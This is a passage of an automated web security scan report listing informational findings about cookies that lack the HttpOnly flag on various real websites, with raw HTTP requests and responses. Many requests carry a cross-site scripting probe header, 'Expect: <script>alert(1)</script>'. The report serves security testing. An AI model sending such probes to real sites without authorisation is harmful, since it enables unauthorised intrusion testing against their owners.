   404 Page Not Found
</title><script id="EktronJS" type="text/javascript" src="/Wo
...[SNIP]...

17.142. http://www.mytelus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytelus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mytelus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:19:38 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7d
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServermt-fe-proxies=1422633152.20480.0000; expires=Mon, 02-May-2011 04:50:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.143. http://www.nextworth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextworth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextworth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:18:00 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 471
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: nx123=APACHE1; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.144. http://www.oshkosh365.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oshkosh365.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:09 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwebservers-http-pool=1191252140.20480.0000; path=/

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

17.145. http://www.plosone.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plosone.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plosone.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:45:13 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 469
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-95144505=9514450c:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.146. http://www.pluspets.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pluspets.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pluspets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.pluspets.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aagouvnxe53hn355tno0xe55; path=/; HttpOnly
Set-Cookie: PSGUID=c183fb00-3203-4395-8eef-169e29e16bd5; expires=Wed, 01-Jun-2011 00:22:19 GMT; path=/
Set-Cookie: Recipe-=,default,,; expires=Tue, 03-May-2011 00:22:19 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90A
P3P: CP="CAO PSA OUR"
Date: Mon, 02 May 2011 00:22:19 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=2550283274.20480.0000; path=/


17.147. http://www.quiltingboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltingboard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltingboard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:22:34 GMT
Server: Apache/2.2.17 (EL)
Vary: Accept-Encoding
Content-Length: 472
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.148. http://www.ronniesmailorder.com/fiche_select.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiche_select.asp?vcc=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronnies.com/micro.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Mon, 02 May 2011 02:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Location: fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
Content-Length: 186
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Set-Cookie: sid=03901941X5K1K2011J9I30I00JPMQ2929R0; path=/
Cache-control: Private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="fiche_select1.asp?cat=Motorcycles&amp;mfg=Kawasaki">here</a>.</body>
<!--T:0.0156-->

17.149. http://www.ronniesmailorder.com/fiche_select1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/f
...[SNIP]...

17.150. http://www.schwabbankcreditcard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schwabbankcreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schwabbankcreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:52:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com
Set-Cookie: TLTUID=77F71A24745610746457FBAF17E09359; Path=/; Domain=.schwabbankcreditcard.com; Expires=Mon, 02-05-2021 00:52:34 GMT
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.151. http://www.searchcactus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchcactus.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchcactus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IMQQWQS10.10.10.2CKKIL; path=/
Server: Microsoft-IIS/5.0
Set-Cookie: serverid=scweb1
P3P: CP="IDC COR CUR OUR STP"
Date: Sun, 01 May 2011 23:26:39 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Mon, 12 Jun 2000 23:51:00 GMT
ETag: "0ca4efc9d4bf1:141c"
Content-Length: 318

..............(.......(....... ........................................................................................................................p......................p.....0...;..0..........
...[SNIP]...

17.152. http://www.securelist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securelist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.securelist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:11:37 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Wed, 20 Oct 2010 17:03:15 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Tue, 31 May 2011 23:11:37 GMT
Cache-Control: max-age=2592000
Set-Cookie: uid=AAAACE296KnAhWlOA5vvAg==; path=/
Accept-Ranges: bytes

..............h.......(....... ...................................-&....................................................................................................................................
...[SNIP]...

17.153. http://www.seoq.com/quotient/2011/04/22/1797/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/1797/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.154. http://www.seoq.com/quotient/2011/04/22/1798/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/2011/04/22/1798/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.155. http://www.seoq.com/quotient/2011/04/22/2270/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2270/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:52 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.156. http://www.seoq.com/quotient/2011/04/22/2271/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2271/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:49:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.157. http://www.seoq.com/quotient/2011/04/22/2272/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/04/22/2272/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.158. http://www.seoq.com/quotient/2011/05/01/2837/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2837/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:51:30 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.159. http://www.seoq.com/quotient/2011/05/01/2838/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2838/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:43 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.160. http://www.seoq.com/quotient/2011/05/01/2839/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2839/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:58 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.161. http://www.seoq.com/quotient/2011/05/01/2840/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotient/2011/05/01/2840/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:31 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.162. http://www.seoq.com/quotient/2011/05/01/2841/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/2011/05/01/2841/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=deleted; expires=Sun, 02-May-2010 02:49:32 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:33 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:34 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

17.163. http://www.seoq.com/quotient/analysis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/analysis/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quotient/analysis/ HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 200 OK
